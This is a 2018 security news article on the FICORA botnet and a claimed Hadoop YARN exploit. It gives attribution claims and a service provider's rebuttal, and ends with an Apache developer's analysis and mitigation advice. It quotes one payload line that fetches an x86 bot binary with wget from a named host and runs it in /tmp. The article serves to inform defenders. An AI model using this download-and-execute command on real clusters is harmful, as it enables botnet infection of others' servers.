In direct response to the publication of Radware’s analysis of the new discovery of the DemonBot malware strain effecting Hadoop clusters earlier the week, October 25th, 2018, 0x20k of Ghost Squad Hackers has released the full source code of the 0day exploit used to build his newest model; the FICORA Botnet. 0x20k, who is also credited as the author of the Yasaku Botnet, is a co-author of the 0day exploit provided below.
Unlike DemonBot which is credited with infecting 70 servers to date, 20k claims to have infected over 1,000 with the potential for pulling over 350 GBPS – verified through Voxility.
According to 20k, also known as URHARMFUL, the author of now infamous DemonBot Malware strain got his source code from one of the authors of Owari and stole it off his servers before dumping it online in September 2018. In this way DemonBot’s “accolades” are going to the wrong person, which is why 20k has decided to release his exploit in the wild to verify ownership before anyone tries to steal it away from him. 20k has also released several videos of him testing out various attacks on different servers and services, including OVH, NFO, ProxyPipe, and Mineplex – allegedly pulling anywhere from 110 GBPS to 200 GBPS.
In terms of how the two bots operate, they are extremely different. For example, DemonBot infects through port 6982 on either 22 or 23 depending on the availability of Python or Perl and telnetd on the device/server.
Whereas FICORA infects through Port 8088. On Demonbot, the DDoS attack vectors supported by are UDP and TCP floods, whereas FICORA utilizes URG Flood on TCP /32. Moreover, DemonBot is just a renamed version of Lizkebab, whereas FICORA is similar to Mirai – but has different functions.
Full 0Day Exploit:
Rogue Security Labs has reached out to several of the affected services to confirm the validity of the attacks. While OVH declined to comment on the matter, John aka Edge100x, President and CEO of NFO confirmed each and every attack targeting their servers – of which there were 3. ProxyPipe, on the other hand, took a defensive stance to my emails, claiming that their servers have never been crashed, and that the company has never seen anything near 200 GBPS.
In response to the DoS attack faced by NFO, John said “The 110 Gbps number is likely from our website https://www.nfoservers.com/networklocations.php” – which it was. Adding that “It is common for attackers to reference that site and assume that they generated that much traffic when they are able to trigger a null-route, though that’s not what it actually means.” He did not confirm or deny whether or not the FICORA botnet could pull that sort of traffic, he just claims hitting the IP’s listed on YouTube wouldn’t necessarily provide the Botnet owner with an accurate reading of the traffic generated. Though he said those IP’s certainly were crashed on the selected dates.
Upon analysis, Steve Loughran, a software developer specializing in Apache Hadoop, told Rogue Security that “If this is happening on a YARN cluster where Kerberos is enabled, then somehow there’s a weakness in the YARN REST API where SPNEGO-authenticated verification of caller identity has failed. This is something we can look at and address. Or it could be something is playing with default passwords for management tools and using that to gain permission.” Explaining that “It’s as if the cluster had telnet or rlogin enabled without password checks.”
However, as 20k explains “FICORA contains telnet, ssh and hadoop servers.” For telnet they “used dictionary style brute-force, same as ssh, hadoop pulled the biggest amount of packets.” 20k added that it was a Remote Code Execution bug that allowed him to execute x86 binary in Hadoop’s directory /tmp.
So the payload was basically cd /tmp; wget http://botet.server/x86; chmod 777 x86; ./x86 hadoop.x86
Perhaps most importantly, as 20k even explains in the release of the exploit “we already bricked this exploit so good luck on pulling them.” For Hadoop developers this is particularly troubling. According to Mr. Loughran, all Apache can do for this problem is “issue advisories for clusters to turn on Kerberos.” Adding that “For this particular cluster, turning off the YARN API may break things, but if the malware depends on its existence (and known HTTP port), reset this property in yarn-site.xml to its default value, false.”
“That may temporarily slow it down —albeit at the risk of breaking apps which depend on it— but if the malware can issue Hadoop RPC calls to YARN it can still submit work, or, as the HDFS filesystem will be equally unprotected, come in via the FS.”
Based on the script, Loughran notes that the exploit “isn’t a remote code execution bug, it is a remote job submission.” As of today, 10/31/2018, Apache is actively trying to figure “if there’s some actual exploit of the Hadoop REST APIs even when security is enabled, or whether this is a case of a Hadoop cluster without security turned on is running somebody else’s code.” No known patch for the exploit is known to exist, and even as Mr. Loughran even admits, considering that the exploit utilizes ssh ports to run Brute-Force Dictionary Attacks running on foundational Linux servers, the fix is potentially “out of our scope.”
With that said, however, developers at Hadoop claim that the exploit listed above is “not a zero-day exploit.” More likely, they say, it is “an attack which schedules work on unsecured Hadoop clusters visible on the network. ” With that said, however, even Loughran can’t figure out how the code exactly works or compromises devices, saying “it may be that there is a real vulnerability in systems with Kerberos enabled. if that turns out to be the case, yes, that’s a 0-day.”
The fix for now he says? “turn security on, don’t make your systems visible on the internet. indeed, keep in a private subnet with restricted access, if at all possible.”
About the Author:
Brian Dunn is a writer & researcher formally working as a content specialist for AnonHQ throughout 2015-2016. Today Brian Dunn owns and operates Rogue Security Labs, a small-time online security service and Rogue Media Labs, a news/media startup attempting to change the way people read & consume cyber news/education.
(Security Affairs – Hadoop, hacking)
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.